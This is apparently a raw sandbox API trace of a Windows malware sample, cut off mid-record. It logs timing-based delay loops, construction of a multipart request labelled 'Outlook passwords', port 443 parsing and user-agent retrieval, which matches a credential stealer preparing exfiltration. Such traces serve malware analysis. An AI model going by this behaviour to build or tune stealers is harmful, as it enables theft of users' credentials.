GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0187.097] GetProcessHeap () returned 0x560000 [0187.097] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617080 | out: hHeap=0x560000) returned 1 [0187.097] Sleep (dwMilliseconds=0x12) [0187.117] GetProcessHeap () returned 0x560000 [0187.117] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617140 [0187.117] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0187.117] GetProcessHeap () returned 0x560000 [0187.117] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0187.117] GetTickCount () returned 0xe98407 [0187.117] GetProcessHeap () returned 0x560000 [0187.118] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617140 [0187.118] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0187.118] GetProcessHeap () returned 0x560000 [0187.118] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0187.118] Sleep (dwMilliseconds=0x15) [0187.140] GetProcessHeap () returned 0x560000 [0187.140] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617270 [0187.140] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0187.140] GetProcessHeap () returned 0x560000 [0187.140] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617270 | out: hHeap=0x560000) returned 1 [0187.140] GetTickCount () returned 0xe98417 [0187.140] GetProcessHeap () returned 0x560000 [0187.140] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617140 [0187.140] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0187.140] GetProcessHeap () returned 0x560000 [0187.140] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0187.140] Sleep (dwMilliseconds=0x18) [0187.167] GetProcessHeap () returned 0x560000 [0187.167] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x6171e0 [0187.167] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0187.167] GetProcessHeap () returned 0x560000 [0187.167] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0187.167] GetTickCount () returned 0xe98436 [0187.167] GetProcessHeap () returned 0x560000 [0187.167] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x6171e0 [0187.167] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0187.167] GetProcessHeap () returned 0x560000 [0187.167] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0187.167] Sleep (dwMilliseconds=0x1b) [0187.195] GetProcessHeap () returned 0x560000 [0187.195] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617270 [0187.195] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0187.195] GetProcessHeap () returned 0x560000 [0187.195] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617270 | out: hHeap=0x560000) returned 1 [0187.195] GetTickCount () returned 0xe98455 [0187.195] GetProcessHeap () returned 0x560000 [0187.195] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617140 [0187.195] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0187.195] GetProcessHeap () returned 0x560000 [0187.195] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0187.195] Sleep (dwMilliseconds=0x1e) [0187.226] GetProcessHeap () returned 0x560000 [0187.226] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617140 [0187.226] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0187.226] GetProcessHeap () returned 0x560000 [0187.226] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0187.226] GetTickCount () returned 0xe98474 [0187.226] GetProcessHeap () returned 0x560000 [0187.226] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617140 [0187.226] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0187.226] GetProcessHeap () returned 0x560000 [0187.226] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0187.226] Sleep (dwMilliseconds=0x21) [0187.279] GetProcessHeap () returned 0x560000 [0187.279] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617080 [0187.279] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0187.279] GetProcessHeap () returned 0x560000 [0187.279] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617080 | out: hHeap=0x560000) returned 1 [0187.279] GetTickCount () returned 0xe984a3 [0187.279] GetProcessHeap () returned 0x560000 [0187.279] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617270 [0187.279] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0187.279] GetProcessHeap () returned 0x560000 [0187.279] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617270 | out: hHeap=0x560000) returned 1 [0187.279] Sleep (dwMilliseconds=0x24) [0187.315] GetProcessHeap () returned 0x560000 [0187.316] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617270 [0187.316] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0187.316] GetProcessHeap () returned 0x560000 [0187.316] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617270 | out: hHeap=0x560000) returned 1 [0187.316] GetTickCount () returned 0xe984c3 [0187.316] GetProcessHeap () returned 0x560000 [0187.316] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x6171e0 [0187.316] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0187.316] GetProcessHeap () returned 0x560000 [0187.316] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0187.316] Sleep (dwMilliseconds=0x27) [0187.356] GetProcessHeap () returned 0x560000 [0187.356] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617270 [0187.356] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0187.356] GetProcessHeap () returned 0x560000 [0187.356] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617270 | out: hHeap=0x560000) returned 1 [0187.356] GetTickCount () returned 0xe984f1 [0187.356] GetProcessHeap () returned 0x560000 [0187.356] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617140 [0187.356] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0187.358] GetProcessHeap () returned 0x560000 [0187.358] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0187.358] Sleep (dwMilliseconds=0x2a) [0187.401] GetProcessHeap () returned 0x560000 [0187.401] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617270 [0187.401] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0187.401] GetProcessHeap () returned 0x560000 [0187.401] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617270 | out: hHeap=0x560000) returned 1 [0187.401] GetTickCount () returned 0xe98520 [0187.401] GetProcessHeap () returned 0x560000 [0187.401] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617140 [0187.401] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0187.401] GetProcessHeap () returned 0x560000 [0187.401] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0187.401] Sleep (dwMilliseconds=0x2d) [0187.491] lstrlenA (lpString="CKIZIKHWATNYNRHY") returned 16 [0187.491] GetProcessHeap () returned 0x560000 [0187.491] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x11) returned 0x615f60 [0187.491] lstrcpyA (in: lpString1=0x615f60, lpString2="CKIZIKHWATNYNRHY" | out: lpString1="CKIZIKHWATNYNRHY") returned="CKIZIKHWATNYNRHY" [0187.491] GetProcessHeap () returned 0x560000 [0187.491] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xa) returned 0x617140 [0187.491] GetProcessHeap () returned 0x560000 [0187.491] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xa) returned 0x617160 [0187.491] GetProcessHeap () returned 0x560000 [0187.491] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617160, Size=0x33) returned 0x623210 [0187.491] GetProcessHeap () returned 0x560000 [0187.491] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0187.491] GetProcessHeap () returned 0x560000 [0187.491] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x560000) returned 1 [0187.491] GetProcessHeap () returned 0x560000 [0187.491] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617270 [0187.491] lstrlenA (lpString="\r\n") returned 2 [0187.491] GetProcessHeap () returned 0x560000 [0187.491] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x3) returned 0x617140 [0187.491] lstrcpyA (in: lpString1=0x617140, lpString2="\r\n" | out: lpString1="\r\n") returned="\r\n" [0187.491] GetProcessHeap () returned 0x560000 [0187.491] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x27) returned 0x613080 [0187.491] lstrlenA (lpString="--") returned 2 [0187.491] GetProcessHeap () returned 0x560000 [0187.491] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x3) returned 0x6171e0 [0187.491] lstrcpyA (in: lpString1=0x6171e0, lpString2="--" | out: lpString1="--") returned="--" [0187.491] GetProcessHeap () returned 0x560000 [0187.491] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x3) returned 0x617150 [0187.491] GetProcessHeap () returned 0x560000 [0187.491] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617150, Size=0x37) returned 0x623750 [0187.492] GetProcessHeap () returned 0x560000 [0187.492] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0187.492] GetProcessHeap () returned 0x560000 [0187.492] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1c) returned 0x615ea0 [0187.492] GetProcessHeap () returned 0x560000 [0187.492] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x615ea0, Size=0x3b) returned 0x623090 [0187.492] GetProcessHeap () returned 0x560000 [0187.492] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1e) returned 0x615ea0 [0187.492] GetProcessHeap () returned 0x560000 [0187.492] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x615ea0, Size=0x87) returned 0x653c00 [0187.492] GetProcessHeap () returned 0x560000 [0187.492] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x623090 | out: hHeap=0x560000) returned 1 [0187.492] GetProcessHeap () returned 0x560000 [0187.492] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x623750 | out: hHeap=0x560000) returned 1 [0187.492] GetProcessHeap () returned 0x560000 [0187.492] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613080 | out: hHeap=0x560000) returned 1 [0187.492] GetProcessHeap () returned 0x560000 [0187.492] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0187.492] lstrlenA (lpString="Outlook passwords") returned 17 [0187.492] GetProcessHeap () returned 0x560000 [0187.492] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x12) returned 0x615f60 [0187.492] lstrcpyA (in: lpString1=0x615f60, lpString2="Outlook passwords" | out: lpString1="Outlook passwords") returned="Outlook passwords" [0187.492] lstrlenA (lpString="\"\r\n\r\n") returned 5 [0187.492] GetProcessHeap () returned 0x560000 [0187.492] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617080 [0187.492] lstrcpyA (in: lpString1=0x617080, lpString2="\"\r\n\r\n" | out: lpString1="\"\r\n\r\n") returned="\"\r\n\r\n" [0187.492] lstrlenA (lpString="\r\n") returned 2 [0187.492] GetProcessHeap () returned 0x560000 [0187.492] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x3) returned 0x6171e0 [0187.492] lstrcpyA (in: lpString1=0x6171e0, lpString2="\r\n" | out: lpString1="\r\n") returned="\r\n" [0187.492] lstrlenA (lpString="\"\r\n\r\n") returned 5 [0187.492] GetProcessHeap () returned 0x560000 [0187.492] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617140 [0187.492] lstrcpyA (in: lpString1=0x617140, lpString2="\"\r\n\r\n" | out: lpString1="\"\r\n\r\n") returned="\"\r\n\r\n" [0187.493] GetProcessHeap () returned 0x560000 [0187.493] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x7) returned 0x617150 [0187.493] GetProcessHeap () returned 0x560000 [0187.493] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x37) returned 0x6236d0 [0187.493] GetProcessHeap () returned 0x560000 [0187.493] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617160 [0187.493] GetProcessHeap () returned 0x560000 [0187.493] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x44) returned 0x620050 [0187.493] GetProcessHeap () returned 0x560000 [0187.493] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x620050, Size=0x8f) returned 0x6108c0 [0187.493] GetProcessHeap () returned 0x560000 [0187.493] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x48) returned 0x620500 [0187.493] GetProcessHeap () returned 0x560000 [0187.493] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x620500, Size=0x99) returned 0x610960 [0187.493] GetProcessHeap () returned 0x560000 [0187.493] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x4d) returned 0x620370 [0187.493] GetProcessHeap () returned 0x560000 [0187.493] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x620370, Size=0x105) returned 0x653d80 [0187.493] GetProcessHeap () returned 0x560000 [0187.493] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x83) returned 0x653ea0 [0187.493] GetProcessHeap () returned 0x560000 [0187.493] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x653ea0, Size=0x109) returned 0x653f40 [0187.493] GetProcessHeap () returned 0x560000 [0187.493] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x85) returned 0x653ea0 [0187.493] GetProcessHeap () returned 0x560000 [0187.493] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x653ea0, Size=0x18f) returned 0x654270 [0187.493] GetProcessHeap () returned 0x560000 [0187.493] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc8) returned 0x654060 [0187.493] GetProcessHeap () returned 0x560000 [0187.493] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x654060, Size=0x19b) returned 0x654410 [0187.493] GetProcessHeap () returned 0x560000 [0187.493] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xce) returned 0x654060 [0187.493] GetProcessHeap () returned 0x560000 [0187.493] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x654060, Size=0x1a5) returned 0x6545c0 [0187.493] GetProcessHeap () returned 0x560000 [0187.493] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd3) returned 0x624120 [0187.493] GetProcessHeap () returned 0x560000 [0187.493] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x624120, Size=0x1c7) returned 0x654a50 [0187.493] GetProcessHeap () returned 0x560000 [0187.494] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617270, Size=0x1c7) returned 0x654c30 [0187.494] GetProcessHeap () returned 0x560000 [0187.494] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x654a50 | out: hHeap=0x560000) returned 1 [0187.494] GetProcessHeap () returned 0x560000 [0187.494] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6545c0 | out: hHeap=0x560000) returned 1 [0187.494] GetProcessHeap () returned 0x560000 [0187.494] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x654410 | out: hHeap=0x560000) returned 1 [0187.494] GetProcessHeap () returned 0x560000 [0187.494] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x654270 | out: hHeap=0x560000) returned 1 [0187.494] GetProcessHeap () returned 0x560000 [0187.494] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x653f40 | out: hHeap=0x560000) returned 1 [0187.494] GetProcessHeap () returned 0x560000 [0187.494] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x653d80 | out: hHeap=0x560000) returned 1 [0187.494] GetProcessHeap () returned 0x560000 [0187.494] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x610960 | out: hHeap=0x560000) returned 1 [0187.494] GetProcessHeap () returned 0x560000 [0187.494] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6108c0 | out: hHeap=0x560000) returned 1 [0187.494] GetProcessHeap () returned 0x560000 [0187.494] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0187.494] GetProcessHeap () returned 0x560000 [0187.494] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6236d0 | out: hHeap=0x560000) returned 1 [0187.494] GetProcessHeap () returned 0x560000 [0187.494] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0187.494] GetProcessHeap () returned 0x560000 [0187.494] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0187.494] GetProcessHeap () returned 0x560000 [0187.494] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0187.494] GetProcessHeap () returned 0x560000 [0187.494] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617080 | out: hHeap=0x560000) returned 1 [0187.494] GetProcessHeap () returned 0x560000 [0187.494] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x560000) returned 1 [0187.494] GetProcessHeap () returned 0x560000 [0187.494] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x6171e0 [0187.494] GetProcessHeap () returned 0x560000 [0187.494] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617270 [0187.494] GetProcessHeap () returned 0x560000 [0187.494] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617080 [0187.494] GetProcessHeap () returned 0x560000 [0187.494] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617080, Size=0x3b) returned 0x623650 [0187.494] GetProcessHeap () returned 0x560000 [0187.494] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1e) returned 0x615d20 [0187.495] GetProcessHeap () returned 0x560000 [0187.495] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x615d20, Size=0x43) returned 0x620230 [0187.495] GetProcessHeap () returned 0x560000 [0187.495] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x620230 | out: hHeap=0x560000) returned 1 [0187.495] GetProcessHeap () returned 0x560000 [0187.495] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x623650 | out: hHeap=0x560000) returned 1 [0187.495] GetProcessHeap () returned 0x560000 [0187.495] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617270 | out: hHeap=0x560000) returned 1 [0187.495] GetProcessHeap () returned 0x560000 [0187.495] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0187.495] GetProcessHeap () returned 0x560000 [0187.495] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617140 [0187.495] GetProcessHeap () returned 0x560000 [0187.495] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617150 [0187.495] GetProcessHeap () returned 0x560000 [0187.495] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617270 [0187.495] GetProcessHeap () returned 0x560000 [0187.495] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617160 [0187.495] GetProcessHeap () returned 0x560000 [0187.495] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x6171e0 [0187.495] GetProcessHeap () returned 0x560000 [0187.495] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617080 [0187.495] GetProcessHeap () returned 0x560000 [0187.495] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x6173f0 [0187.495] GetProcessHeap () returned 0x560000 [0187.495] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x617450 [0187.495] GetProcessHeap () returned 0x560000 [0187.495] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1a) returned 0x615d20 [0187.495] GetProcessHeap () returned 0x560000 [0187.495] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x55) returned 0x619530 [0187.495] GetProcessHeap () returned 0x560000 [0187.495] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x4) returned 0x617350 [0187.495] GetProcessHeap () returned 0x560000 [0187.495] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617350 | out: hHeap=0x560000) returned 1 [0187.495] lstrlenA (lpString="/") returned 1 [0187.495] GetProcessHeap () returned 0x560000 [0187.495] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617300 [0187.495] lstrcpyA (in: lpString1=0x617300, lpString2="/" | out: lpString1="/") returned="/" [0187.495] GetProcessHeap () returned 0x560000 [0187.495] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617300 | out: hHeap=0x560000) returned 1 [0187.495] lstrlenA (lpString=":") returned 1 [0187.496] GetProcessHeap () returned 0x560000 [0187.496] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x6172f0 [0187.496] lstrcpyA (in: lpString1=0x6172f0, lpString2=":" | out: lpString1=":") returned=":" [0187.496] GetProcessHeap () returned 0x560000 [0187.496] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6172f0 | out: hHeap=0x560000) returned 1 [0187.496] GetProcessHeap () returned 0x560000 [0187.496] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x4) returned 0x6172b0 [0187.496] GetProcessHeap () returned 0x560000 [0187.496] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x4) returned 0x617470 [0187.496] GetProcessHeap () returned 0x560000 [0187.496] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6172b0 | out: hHeap=0x560000) returned 1 [0187.496] GetProcessHeap () returned 0x560000 [0187.496] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617460 [0187.496] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToIntExA") returned 0x7ffb262f5d10 [0187.496] GetProcessHeap () returned 0x560000 [0187.496] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617460 | out: hHeap=0x560000) returned 1 [0187.496] StrToIntExA (in: pszString="443", dwFlags=0x0, piRet=0x231ee40 | out: piRet=0x231ee40) returned 1 [0187.496] GetProcessHeap () returned 0x560000 [0187.496] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617470 | out: hHeap=0x560000) returned 1 [0187.496] GetProcessHeap () returned 0x560000 [0187.496] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x6172c0 [0187.496] GetProcessHeap () returned 0x560000 [0187.496] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x6172b0 [0187.496] GetProcessHeap () returned 0x560000 [0187.496] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617380 [0187.496] GetProcessHeap () returned 0x560000 [0187.496] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617400 [0187.496] GetProcessHeap () returned 0x560000 [0187.496] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617460 [0187.496] GetProcessHeap () returned 0x560000 [0187.496] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x6173c0 [0187.496] GetProcessHeap () returned 0x560000 [0187.497] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617470 [0187.497] GetProcessHeap () returned 0x560000 [0187.497] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617410 [0187.497] GetProcessHeap () returned 0x560000 [0187.497] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617350 [0187.497] GetProcessHeap () returned 0x560000 [0187.497] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617340 [0187.497] GetProcessHeap () returned 0x560000 [0187.497] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x6172c0, Size=0xd) returned 0x617280 [0187.497] GetProcessHeap () returned 0x560000 [0187.497] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617340 | out: hHeap=0x560000) returned 1 [0187.497] GetProcessHeap () returned 0x560000 [0187.497] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x3e) returned 0x6234d0 [0187.497] GetProcessHeap () returned 0x560000 [0187.497] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x6172b0, Size=0x3e) returned 0x623510 [0187.497] GetProcessHeap () returned 0x560000 [0187.497] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6234d0 | out: hHeap=0x560000) returned 1 [0187.497] GetProcessHeap () returned 0x560000 [0187.497] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617410, Size=0x105) returned 0x6108c0 [0187.497] GetProcAddress (hModule=0x7ffb174f0000, lpProcName="ObtainUserAgentString") returned 0x7ffb1755deb0 [0187.497] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x231eab0, cbSize=0x231eed0 | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0x231eed0) returned 0x0 [0187.605] lstrlenA (lpString="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)") returned 156 [0187.605] GetProcessHeap () returned 0x560000 [0187.605] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9d) returned 0x654390 [0187.605] lstrcpyA (in: lpString1=0x654390, lpString2="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)" | out: lpString1="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)") returned="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)" [0187.605] lstrlenA (lpString="*/*") returned 3 [0187.605] GetProcessHeap () returned 0x560000 [0187.605] 